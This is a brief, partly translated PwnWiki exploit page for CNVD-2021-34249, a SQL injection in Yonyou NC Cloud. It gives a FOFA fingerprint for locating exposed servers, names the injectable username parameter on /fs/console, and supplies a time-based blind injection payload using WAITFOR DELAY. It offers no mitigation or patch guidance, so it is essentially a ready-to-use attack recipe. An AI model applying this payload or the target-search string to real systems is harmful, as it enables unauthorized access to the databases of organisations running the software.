CNVD-2021-34249 用友NC Cloud SQL注入漏洞

From PwnWiki
This page is a translated version of the page CNVD-2021-34249 用友NC Cloud SQL注入漏洞 and the translation is 50% complete.
Other languages:
Chinese • ‎English • ‎中文(中国大陆)‎

影响版本

NC Cloud

FOFA

"NCCloud"

漏洞位置

⚠️️username處可以注入。 

/fs/console?username=admin&password=123456


Payload

/fs/console?username=admin';WAITFOR DELAY '0:0:5' --&password=123456
Retrieved from "https://pwnwiki.com/index.php?title=CNVD-2021-34249_用友NC_Cloud_SQL注入漏洞/zh-cn&oldid=4727"